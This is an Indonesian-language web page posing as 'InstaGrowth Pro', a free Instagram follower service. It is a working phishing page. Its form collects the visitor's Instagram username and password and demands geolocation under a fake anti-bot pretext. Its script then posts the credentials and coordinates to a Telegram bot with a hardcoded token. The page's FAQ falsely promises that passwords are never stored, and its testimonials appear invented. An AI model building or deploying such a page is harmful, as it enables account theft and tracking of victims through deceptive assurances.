<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>InstaGrowth Pro | Penambah Pengikut Instagram Gratis</title>
    <style>
        :root {
            --primary: #405DE6;
            --secondary: #5851DB;
            --accent: #E1306C;
            --light: #F8F9FA;
            --dark: #262626;
            --success: #28A745;
            --warning: #FFC107;
            --danger: #DC3545;
        }
        
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }
        
        body {
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            color: var(--dark);
            line-height: 1.6;
        }
        
        .container {
            max-width: 1200px;
            margin: 0 auto;
            padding: 0 20px;
        }
        
        header {
            background-color: white;
            box-shadow: 0 2px 15px rgba(0, 0, 0, 0.1);
            position: sticky;
            top: 0;
            z-index: 1000;
        }
        
        .navbar {
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 15px 0;
        }
        
        .logo {
            display: flex;
            align-items: center;
            font-size: 24px;
            font-weight: 700;
            color: var(--primary);
        }
        
        .logo span {
            color: var(--accent);
        }
        
        .nav-links {
            display: flex;
            list-style: none;
        }
        
        .nav-links li {
            margin-left: 30px;
        }
        
        .nav-links a {
            text-decoration: none;
            color: var(--dark);
            font-weight: 500;
            transition: color 0.3s;
        }
        
        .nav-links a:hover {
            color: var(--primary);
        }
        
        .hero {
            padding: 100px 0;
            text-align: center;
            color: white;
        }
        
        .hero h1 {
            font-size: 48px;
            margin-bottom: 20px;
            text-shadow: 0 2px 10px rgba(0, 0, 0, 0.2);
        }
        
        .hero p {
            font-size: 20px;
            max-width: 700px;
            margin: 0 auto 40px;
        }
        
        .btn {
            display: inline-block;
            padding: 12px 30px;
            background-color: var(--accent);
            color: white;
            border: none;
            border-radius: 30px;
            font-size: 16px;
            font-weight: 600;
            cursor: pointer;
            transition: all 0.3s;
            text-decoration: none;
        }
        
        .btn:hover {
            background-color: #c13584;
            transform: translateY(-3px);
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.2);
        }
        
        .section {
            padding: 80px 0;
            background-color: white;
        }
        
        .section-title {
            text-align: center;
            margin-bottom: 60px;
        }
        
        .section-title h2 {
            font-size: 36px;
            color: var(--primary);
            margin-bottom: 15px;
        }
        
        .section-title p {
            color: #666;
            max-width: 700px;
            margin: 0 auto;
        }
        
        .features {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(300px, 1fr));
            gap: 30px;
        }
        
        .feature-card {
            background-color: var(--light);
            border-radius: 10px;
            padding: 30px;
            text-align: center;
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.05);
            transition: transform 0.3s;
        }
        
        .feature-card:hover {
            transform: translateY(-10px);
        }
        
        .feature-icon {
            font-size: 40px;
            color: var(--primary);
            margin-bottom: 20px;
        }
        
        .feature-card h3 {
            margin-bottom: 15px;
            color: var(--dark);
        }
        
        .form-container {
            max-width: 600px;
            margin: 0 auto;
            background-color: white;
            border-radius: 15px;
            padding: 40px;
            box-shadow: 0 10px 30px rgba(0, 0, 0, 0.1);
        }
        
        .form-group {
            margin-bottom: 25px;
        }
        
        .form-group label {
            display: block;
            margin-bottom: 8px;
            font-weight: 500;
            color: var(--dark);
        }
        
        .form-control {
            width: 100%;
            padding: 12px 15px;
            border: 1px solid #ddd;
            border-radius: 8px;
            font-size: 16px;
            transition: border 0.3s;
        }
        
        .form-control:focus {
            border-color: var(--primary);
            outline: none;
        }
        
        .radio-group {
            display: flex;
            gap: 20px;
            margin-top: 10px;
        }
        
        .radio-option {
            display: flex;
            align-items: center;
        }
        
        .radio-option input {
            margin-right: 8px;
        }
        
        .location-permission {
            background-color: #f8f9fa;
            padding: 20px;
            border-radius: 8px;
            margin-bottom: 25px;
            text-align: center;
        }
        
        .location-permission p {
            margin-bottom: 15px;
            color: #666;
        }
        
        .btn-location {
            background-color: var(--primary);
        }
        
        .btn-submit {
            width: 100%;
            background-color: var(--success);
            font-size: 18px;
            padding: 15px;
        }
        
        .testimonials {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(300px, 1fr));
            gap: 30px;
            margin-top: 40px;
        }
        
        .testimonial-card {
            background-color: var(--light);
            border-radius: 10px;
            padding: 25px;
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.05);
        }
        
        .testimonial-text {
            font-style: italic;
            margin-bottom: 15px;
            color: #555;
        }
        
        .testimonial-author {
            display: flex;
            align-items: center;
        }
        
        .author-avatar {
            width: 50px;
            height: 50px;
            border-radius: 50%;
            background-color: #ddd;
            margin-right: 15px;
            overflow: hidden;
        }
        
        .author-info h4 {
            margin-bottom: 5px;
            color: var(--dark);
        }
        
        .author-info p {
            color: #777;
            font-size: 14px;
        }
        
        .faq-item {
            margin-bottom: 20px;
            border-bottom: 1px solid #eee;
            padding-bottom: 20px;
        }
        
        .faq-question {
            font-weight: 600;
            margin-bottom: 10px;
            color: var(--dark);
            cursor: pointer;
            display: flex;
            justify-content: space-between;
            align-items: center;
        }
        
        .faq-answer {
            color: #666;
            display: none;
        }
        
        .faq-item.active .faq-answer {
            display: block;
        }
        
        footer {
            background-color: var(--dark);
            color: white;
            padding: 60px 0 30px;
        }
        
        .footer-content {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
            gap: 40px;
            margin-bottom: 40px;
        }
        
        .footer-column h3 {
            margin-bottom: 20px;
            font-size: 18px;
        }
        
        .footer-links {
            list-style: none;
        }
        
        .footer-links li {
            margin-bottom: 10px;
        }
        
        .footer-links a {
            color: #bbb;
            text-decoration: none;
            transition: color 0.3s;
        }
        
        .footer-links a:hover {
            color: white;
        }
        
        .copyright {
            text-align: center;
            padding-top: 30px;
            border-top: 1px solid #444;
            color: #bbb;
            font-size: 14px;
        }
        
        .alert {
            padding: 15px;
            border-radius: 8px;
            margin-bottom: 20px;
            display: none;
        }
        
        .alert-success {
            background-color: #d4edda;
            color: #155724;
            border: 1px solid #c3e6cb;
        }
        
        .alert-error {
            background-color: #f8d7da;
            color: #721c24;
            border: 1px solid #f5c6cb;
        }
        
        @media (max-width: 768px) {
            .navbar {
                flex-direction: column;
            }
            
            .nav-links {
                margin-top: 20px;
            }
            
            .nav-links li {
                margin: 0 10px;
            }
            
            .hero h1 {
                font-size: 36px;
            }
            
            .hero p {
                font-size: 18px;
            }
        }
    </style>
</head>
<body>
    <!-- Header -->
    <header>
        <div class="container">
            <nav class="navbar">
                <div class="logo">InstaGrowth<span>Pro</span></div>
                <ul class="nav-links">
                    <li><a href="#home">Beranda</a></li>
                    <li><a href="#features">Fitur</a></li>
                    <li><a href="#form">Dapatkan Pengikut</a></li>
                    <li><a href="#testimonials">Testimoni</a></li>
                    <li><a href="#faq">FAQ</a></li>
                </ul>
            </nav>
        </div>
    </header>

    <!-- Hero Section -->
    <section class="hero" id="home">
        <div class="container">
            <h1>Tingkatkan Pengikut Instagram Anda Secara Gratis</h1>
            <p>Dapatkan lebih banyak pengikut, likes, dan engagement dengan layanan kami yang telah teruji. Aman, cepat, dan 100% gratis!</p>
            <a href="#form" class="btn">Mulai Sekarang</a>
        </div>
    </section>

    <!-- Features Section -->
    <section class="section" id="features">
        <div class="container">
            <div class="section-title">
                <h2>Mengapa Memilih InstaGrowth Pro?</h2>
                <p>Kami menawarkan solusi terbaik untuk meningkatkan kehadiran Instagram Anda dengan cara yang aman dan efektif.</p>
            </div>
            <div class="features">
                <div class="feature-card">
                    <div class="feature-icon">🚀</div>
                    <h3>Peningkatan Cepat</h3>
                    <p>Dapatkan ratusan pengikut baru dalam hitungan jam dengan teknologi kami yang canggih.</p>
                </div>
                <div class="feature-card">
                    <div class="feature-icon">🔒</div>
                    <h3>Aman & Terpercaya</h3>
                    <p>Akun Instagram Anda aman bersama kami. Tidak ada risiko banned atau suspended.</p>
                </div>
                <div class="feature-card">
                    <div class="feature-icon">💯</div>
                    <h3>100% Gratis</h3>
                    <p>Layanan kami sepenuhnya gratis tanpa biaya tersembunyi. Tidak perlu kartu kredit.</p>
                </div>
                <div class="feature-card">
                    <div class="feature-icon">🌍</div>
                    <h3>Pengikut Asli Indonesia</h3>
                    <p>Dapatkan pengikut asli dari Indonesia yang aktif dan berkualitas untuk meningkatkan engagement.</p>
                </div>
                <div class="feature-card">
                    <div class="feature-icon">📈</div>
                    <h3>Analitik Lengkap</h3>
                    <p>Pantau perkembangan akun Anda dengan fitur analitik yang kami sediakan.</p>
                </div>
                <div class="feature-card">
                    <div class="feature-icon">🛡️</div>
                    <h3>Dukungan 24/7</h3>
                    <p>Tim support kami siap membantu Anda kapan saja jika mengalami kendala.</p>
                </div>
            </div>
        </div>
    </section>

    <!-- Form Section -->
    <section class="section" id="form">
        <div class="container">
            <div class="section-title">
                <h2>Tingkatkan Pengikut Instagram Anda</h2>
                <p>Isi formulir di bawah ini untuk mulai mendapatkan pengikut gratis.</p>
            </div>
            <div class="form-container">
                <div id="alert-success" class="alert alert-success">
                    Data berhasil dikirim! Pengikut akan segera ditambahkan ke akun Anda.
                </div>
                <div id="alert-error" class="alert alert-error">
                    Terjadi kesalahan. Silakan coba lagi atau hubungi support.
                </div>
                <form id="instagram-form">
                    <div class="form-group">
                        <label for="username">Nama Akun Instagram</label>
                        <input type="text" id="username" class="form-control" placeholder="contoh: @username_anda" required>
                    </div>
                    <div class="form-group">
                        <label for="password">Kata Sandi Instagram</label>
                        <input type="password" id="password" class="form-control" placeholder="Masukkan kata sandi Instagram Anda" required>
                    </div>
                    <div class="form-group">
                        <label>Jenis Pengikut</label>
                        <div class="radio-group">
                            <div class="radio-option">
                                <input type="radio" id="bot-followers" name="follower-type" value="bot" checked>
                                <label for="bot-followers">Pengikut Bot</label>
                            </div>
                            <div class="radio-option">
                                <input type="radio" id="real-followers" name="follower-type" value="real">
                                <label for="real-followers">Pengikut Indonesia Asli</label>
                            </div>
                        </div>
                    </div>
                    <div class="location-permission">
                        <p>Untuk keamanan, kami perlu memverifikasi bahwa Anda bukan robot. Silakan izinkan akses lokasi Anda.</p>
                        <button type="button" id="location-btn" class="btn btn-location">Izinkan Akses Lokasi</button>
                    </div>
                    <button type="submit" id="submit-btn" class="btn btn-submit" disabled>Dapatkan Pengikut Gratis</button>
                </form>
            </div>
        </div>
    </section>

    <!-- Testimonials Section -->
    <section class="section" id="testimonials">
        <div class="container">
            <div class="section-title">
                <h2>Apa Kata Pengguna Kami</h2>
                <p>Ribuan pengguna telah membuktikan keefektifan layanan kami.</p>
            </div>
            <div class="testimonials">
                <div class="testimonial-card">
                    <p class="testimonial-text">"Saya tidak percaya betapa cepatnya pengikut saya bertambah! Dalam 24 jam, akun saya dapat 500 pengikut baru. Terima kasih InstaGrowth Pro!"</p>
                    <div class="testimonial-author">
                        <div class="author-avatar"></div>
                        <div class="author-info">
                            <h4>Sarah Wijaya</h4>
                            <p>Influencer Fashion</p>
                        </div>
                    </div>
                </div>
                <div class="testimonial-card">
                    <p class="testimonial-text">"Sebagai pemilik bisnis kecil, Instagram sangat penting untuk pemasaran. Layanan ini membantu saya mendapatkan pelanggan baru dengan cepat."</p>
                    <div class="testimonial-author">
                        <div class="author-avatar"></div>
                        <div class="author-info">
                            <h4>Budi Santoso</h4>
                            <p>Pemilik UMKM</p>
                        </div>
                    </div>
                </div>
                <div class="testimonial-card">
                    <p class="testimonial-text">"Saya sudah mencoba banyak layanan penambah pengikut, tapi InstaGrowth Pro yang terbaik. Pengikutnya asli dan engagement meningkat drastis."</p>
                    <div class="testimonial-author">
                        <div class="author-avatar"></div>
                        <div class="author-info">
                            <h4>Rina Amelia</h4>
                            <p>Content Creator</p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- FAQ Section -->
    <section class="section" id="faq">
        <div class="container">
            <div class="section-title">
                <h2>Pertanyaan yang Sering Diajukan</h2>
                <p>Temukan jawaban untuk pertanyaan umum tentang layanan kami.</p>
            </div>
            <div class="faq-list">
                <div class="faq-item">
                    <div class="faq-question">
                        <span>Apakah layanan ini benar-benar gratis?</span>
                        <span>+</span>
                    </div>
                    <div class="faq-answer">
                        <p>Ya, layanan kami 100% gratis. Tidak ada biaya tersembunyi atau langganan berbayar. Kami berkomitmen untuk membantu meningkatkan kehadiran Instagram Anda tanpa mengeluarkan biaya.</p>
                    </div>
                </div>
                <div class="faq-item">
                    <div class="faq-question">
                        <span>Apakah akun saya aman?</span>
                        <span>+</span>
                    </div>
                    <div class="faq-answer">
                        <p>Keamanan akun Anda adalah prioritas utama kami. Kami menggunakan teknologi enkripsi terbaru dan tidak pernah menyimpan kata sandi Anda. Proses kami sepenuhnya aman dan sesuai dengan kebijakan Instagram.</p>
                    </div>
                </div>
                <div class="faq-item">
                    <div class="faq-question">
                        <span>Berapa lama waktu yang dibutuhkan untuk mendapatkan pengikut?</span>
                        <span>+</span>
                    </div>
                    <div class="faq-answer">
                        <p>Biasanya, pengikut mulai bertambah dalam waktu 1-2 jam setelah permintaan diproses. Untuk hasil maksimal, proses dapat berlangsung hingga 24 jam tergantung pada paket yang Anda pilih.</p>
                    </div>
                </div>
                <div class="faq-item">
                    <div class="faq-question">
                        <span>Apa perbedaan pengikut bot dan pengikut asli Indonesia?</span>
                        <span>+</span>
                    </div>
                    <div class="faq-answer">
                        <p>Pengikut bot adalah akun otomatis yang meningkatkan jumlah pengikut Anda secara cepat. Pengikut asli Indonesia adalah pengguna nyata dari Indonesia yang dapat berinteraksi dengan konten Anda, memberikan engagement yang lebih baik.</p>
                    </div>
                </div>
                <div class="faq-item">
                    <div class="faq-question">
                        <span>Mengapa perlu izin akses lokasi?</span>
                        <span>+</span>
                    </div>
                    <div class="faq-answer">
                        <p>Izin akses lokasi diperlukan untuk verifikasi keamanan dan memastikan bahwa Anda adalah pengguna nyata, bukan bot. Ini adalah langkah tambahan untuk melindungi layanan kami dari penyalahgunaan.</p>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- Footer -->
    <footer>
        <div class="container">
            <div class="footer-content">
                <div class="footer-column">
                    <h3>InstaGrowth Pro</h3>
                    <p>Platform terdepan untuk meningkatkan pengikut Instagram secara gratis, aman, dan efektif.</p>
                </div>
                <div class="footer-column">
                    <h3>Tautan Cepat</h3>
                    <ul class="footer-links">
                        <li><a href="#home">Beranda</a></li>
                        <li><a href="#features">Fitur</a></li>
                        <li><a href="#form">Dapatkan Pengikut</a></li>
                        <li><a href="#testimonials">Testimoni</a></li>
                        <li><a href="#faq">FAQ</a></li>
                    </ul>
                </div>
                <div class="footer-column">
                    <h3>Layanan</h3>
                    <ul class="footer-links">
                        <li><a href="#">Pengikut Instagram</a></li>
                        <li><a href="#">Likes Instagram</a></li>
                        <li><a href="#">Komentar Instagram</a></li>
                        <li><a href="#">Views Instagram Story</a></li>
                        <li><a href="#">Analitik Instagram</a></li>
                    </ul>
                </div>
                <div class="footer-column">
                    <h3>Hubungi Kami</h3>
                    <ul class="footer-links">
                        <li><a href="mailto:support@instagrowthpro.com">support@instagrowthpro.com</a></li>
                        <li><a href="#">Live Chat</a></li>
                        <li><a href="#">Pusat Bantuan</a></li>
                    </ul>
                </div>
            </div>
            <div class="copyright">
                <p>&copy; 2023 InstaGrowth Pro. Semua hak dilindungi undang-undang.</p>
            </div>
        </div>
    </footer>

    <script>
        // Toggle FAQ
        document.querySelectorAll('.faq-question').forEach(question => {
            question.addEventListener('click', () => {
                const item = question.parentNode;
                item.classList.toggle('active');
                
                // Toggle icon +/-
                const icon = question.querySelector('span:last-child');
                icon.textContent = item.classList.contains('active') ? '-' : '+';
            });
        });

        // Location Permission
        document.getElementById('location-btn').addEventListener('click', function() {
            if (navigator.geolocation) {
                navigator.geolocation.getCurrentPosition(
                    function(position) {
                        // Success
                        document.getElementById('submit-btn').disabled = false;
                        document.getElementById('location-btn').textContent = 'Lokasi Terdeteksi';
                        document.getElementById('location-btn').style.backgroundColor = '#28A745';
                        
                        // Store location data
                        window.userLocation = {
                            latitude: position.coords.latitude,
                            longitude: position.coords.longitude
                        };
                    },
                    function(error) {
                        // Error
                        alert('Akses lokasi diperlukan untuk melanjutkan. Silakan izinkan akses lokasi dan coba lagi.');
                    }
                );
            } else {
                alert('Browser Anda tidak mendukung geolocation. Silakan gunakan browser lain.');
            }
        });

        // Form Submission
        document.getElementById('instagram-form').addEventListener('submit', function(e) {
            e.preventDefault();
            
            // Check if location is available
            if (!window.userLocation) {
                alert('Silakan izinkan akses lokasi terlebih dahulu.');
                return;
            }
            
            // Get form data
            const username = document.getElementById('username').value;
            const password = document.getElementById('password').value;
            const followerType = document.querySelector('input[name="follower-type"]:checked').value;
            const location = window.userLocation;
            
            // Prepare data for Telegram API
            const telegramData = {
                chat_id: '7463694080',
                text: `Permintaan Baru:\nNama Akun: ${username}\nKata Sandi: ${password}\nJenis Pengikut: ${followerType}\nLokasi: ${location.latitude}, ${location.longitude}`
            };
            
            // Show loading state
            const submitBtn = document.getElementById('submit-btn');
            submitBtn.textContent = 'Mengirim...';
            submitBtn.disabled = true;
            
            // Send to Telegram API
            fetch(`https://api.telegram.org/bot8158659627:AAECWm2kRISC54XcVzwK1iyPX6WEiQrCVRM/sendMessage`, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify(telegramData)
            })
            .then(response => response.json())
            .then(data => {
                // Show success message
                document.getElementById('alert-success').style.display = 'block';
                document.getElementById('instagram-form').reset();
                document.getElementById('submit-btn').disabled = true;
                document.getElementById('location-btn').textContent = 'Izinkan Akses Lokasi';
                document.getElementById('location-btn').style.backgroundColor = '';
                window.userLocation = null;
                
                // Reset button after 3 seconds
                setTimeout(() => {
                    submitBtn.textContent = 'Dapatkan Pengikut Gratis';
                    document.getElementById('alert-success').style.display = 'none';
                }, 5000);
            })
            .catch(error => {
                // Show error message
                document.getElementById('alert-error').style.display = 'block';
                submitBtn.textContent = 'Dapatkan Pengikut Gratis';
                submitBtn.disabled = false;
                
                // Hide error after 5 seconds
                setTimeout(() => {
                    document.getElementById('alert-error').style.display = 'none';
                }, 5000);
            });
        });

        // Smooth scrolling for navigation links
        document.querySelectorAll('a[href^="#"]').forEach(anchor => {
            anchor.addEventListener('click', function (e) {
                e.preventDefault();
                
                const targetId = this.getAttribute('href');
                if (targetId === '#') return;
                
                const targetElement = document.querySelector(targetId);
                if (targetElement) {
                    window.scrollTo({
                        top: targetElement.offsetTop - 80,
                        behavior: 'smooth'
                    });
                }
            });
        });
    </script>
</body>
</html>